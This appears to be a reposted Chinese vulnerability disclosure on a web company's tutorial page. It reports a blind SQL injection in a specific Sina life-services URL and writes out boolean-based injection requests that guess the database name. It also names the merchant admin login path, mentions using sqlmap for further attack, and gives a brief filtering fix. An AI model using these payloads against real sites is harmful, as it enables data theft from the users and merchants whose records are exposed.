新浪生活服务互动社区Mysql盲注漏洞的介绍及其修复方法(图解) - IT知识教程 - 中企动力

登录注册

做网站
做推广
做电商

服务支持
应用与服务
关于中企

中企商学院

查看更多

核心必备

数字门户内贸营销版

全球营销版通用版

企业域名企业邮箱

行业应用

医院专业版学校专业版

律所专业版数字名片

视觉设计

VR全景视频制作

图片拍摄

网络安全

等保认证 SSL证书

查看更多

核心必备

全球SEO 百度首屏展位

Yandex推广 Google海外推广

解决方案

外贸推广解决方案

查看更多

核心必备

全网商城移动商城

装修服务

电商产品拍摄

解决方案

零售行业OMO解决方案政府采购电商平台解决方案

查看更多

查看更多

查看更多

帮助中心

数字门户产品服务保障服务中心

设计师信息化讲堂

解决方案

外贸数字营销解决方案企业视频直播解决方案

企业安全等保解决方案品牌数字化营销解决方案

品牌零售数字商业解决方案智慧园区解决方案

B2B电商平台建设解决方案数字化政务门户解决方案

开拓型外贸企业解决方案成长型外贸企业解决方案

行业解决方案

实战应用

产品剖析律所行业专家

平台产品导入外贸信息洞察

行业解读

学习中心

电商运营学院网站建设学院

查看更多

应用与服务

VR智能全景个性化场景定制服务

网站安全服务云定制

企业视频直播 Banner设计

产品主图设计图片处理

查看更多

企业概况

关于我们企业文化

发展历程数码庄园

法律隐私

资质荣誉

企业资质所获荣誉

新闻中心

新闻公告媒体报道

社会公益视频中心

行业资讯

联系我们

联系我们全国网点

工作机会

查看更多

查看更多

网站建设 IT知识 IT知识教程新浪生活服务互动社区Mysql盲注漏洞的介绍及其修复方法(图解)

新浪生活服务互动社区Mysql盲注漏洞的介绍及其修复方法(图解)

2021-05-23 21:13:27

注入漏洞存在地址为
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310
其中该漏洞可以导致数据泄漏，其中泄漏的数据包括团购，优惠券、以及用户联系方式，smslog，团购商户、admin等数据。
同时，团购的商户登陆地址为
http://life.sina.com.cn/tuanadmin
漏洞证明：下面为手工猜解数据库名的语句为
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and Length((database()))<5
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=108
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=105
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=102
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=101
下图为注入是返回对正确与错误的截图

注入返回对的情况截图

注入时返回错的情况截图
一下是使用sqlmap对注入点进行注入攻击，一下该例为查询数据库banner，通过改变命令参数可以对其进行更深入的攻击。

修复方案：
对其uid参数进行检查并且进行过滤。
作者 Insight-labs

声明：本页内容来源网络，仅供用户参考；我单位不保证亦不表示资料全面及准确无误，也不保证亦不表示这些资料为最新信息，如因任何原因，本网内容或者用户因倚赖本网内容造成任何损失或损害，我单位将不会负任何法律责任。如涉及版权问题，请提交至online#300.cn邮箱联系删除。

相关文章

DVWA系列之1 环境搭建

DVWA是用PHP+MySQL编写的一套用于常规Web漏洞教学和检测的Web脆弱性测试程序，包含了SQL注入、XSS、盲注等常见的一些安全漏洞，是一个非常好的网

建站公司浅析新时期下社区商业O2O的发展趋势

社区商业，提供了社区居民需要的日常生活服务，这些服务具有经常性、便利性，同时社区商业也是以社区居民为服务对象，以便民利民为宗旨，以提高生活质量、满足居民综合消费

桌面图标异常是什么原因桌面图标异常解决方法

桌面图标异常是怎么回事异常图标修复方法桌面图标异常是怎么回事异常图标修复方法桌面图标异常是怎么回事异常图标修复方法桌面图标异常是怎么回事异常图标修复方法桌面图标

桌面图标异常是什么原因桌面图标异常解决方法

桌面图标异常是怎么回事异常图标修复方法桌面图标异常是怎么回事异常图标修复方法桌面图标异常是怎么回事异常图标修复方法桌面图标异常是怎么回事异常图标修复方法桌面图标

360安全卫士如何关闭漏洞修复

以电脑版360安全卫士为例，360安全卫士关闭漏洞修复方法是：　　1、打开360安全卫士，选择系统修复；　　2、选择360安全卫士软件界面右上角的三角按钮，选择

7 x 24

全国售后支持
100 倍

故障时长赔付
25 年

25年行业服务经验
70 家

全国售后支持
1600+ 名

超千人的设计、研发团队
150 万

服务企业客户150万家

Copyright © 1999-2025 中企动力科技股份有限公司（300.cn）版权所有京公网安备11030102010293号京ICP证010249-2

在线咨询

建站在线咨询

获取方案

获取建站报价/方案

我们联系您

微信咨询

扫一扫添加
动力姐姐微信

TOP